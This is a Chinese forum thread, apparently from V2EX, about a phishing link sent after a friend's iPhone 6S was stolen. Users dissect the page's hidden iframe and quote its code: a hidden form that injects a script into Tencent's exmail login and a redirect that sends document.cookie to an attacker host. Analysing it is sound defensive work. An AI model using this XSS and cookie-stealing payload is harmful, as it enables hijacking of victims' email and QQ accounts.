朋友 6S 被偷了，小偷（可能是团伙）发来链接偷取 APPLE ID

用的阿里云……

网址点进去后发现是个新闻网站。。。

@BOYPT

两个 iframe ，一些常见网站是人民网的分享接口进行的访问，不是攻击者。

另外一个 iframe 是进行攻击者的操作：

<iframe src="http://society.people.com.cn/n/2015/1031/c1008-27760163.html" style="width:100%;height:1200px;border:none"></iframe>

<iframe src="/htmlpage5.html" style="display:none"></iframe>

---------------

function test(PARAMS) {
var temp = document.createElement("form");
temp.acceptCharset = "utf-8";
//By Wfox
temp.action = 'http://m.exmail.qq.com/cgi-bin/login';
temp.method = "post";
temp.style.display = "none";
for (var x in PARAMS) {
var opt = document.createElement("textarea");
opt.name = x;
opt.value = PARAMS[x];
temp.appendChild(opt);
}
document.body.appendChild(temp);
temp.submit();
}
test({
uin: '\\&quot;&lt;/script&gt;&lt;script src=http://ryige.com/q/8&gt;&lt;/script&gt;',
});


document.domain="qq.com";
window.onload=documentrrady;
function documentrrady(){
window.location.href="http://ryige.com/server/AddQQUser?c="+encodeURI(document.cookie)+"&u=lockKey8&r="+encodeURI(document.referrer)
};

比较好奇的是，往 qq 的 login post 一下，然后 document.domain="qq.com";这样就能从 document.cookie 拿信息了？？

吓得我赶紧改了 QQ 密码，清空了浏览器 cookie ，往常用网站上重新登陆了次，刷新了 cookie 。。。这样就没事了吧？

这次还好忍住了，先看评论，保命

嗯，刚才测试了一下，如果你的企业邮箱在登录情况下访问了如上网址，是可以登录你的邮箱。

@Evi1m0 蘑菇君？

用虚拟机开，发现 firefox 下 http://ryige.com/q/8 的脚本未被执行 不知怎么回事

难道我去慢了，打开只有一个 IIS 的图标什么事情都没有发生。

@skyun 个人认为密码还是窃取不到的..

@wohenyingyu01 并不是 只是挂了一个 iframe

你还是提醒一下别人别乱点链接吧。。。
我觉得很多人点玩看了评论都吓到了

我擦...点开了...有什么补救方法嘛！

@RHFS 提醒了

@curiosity 如果担心，可以改个 QQ 密码就行了

@kikyous web 第一课： cookie 在本地， session 在服务器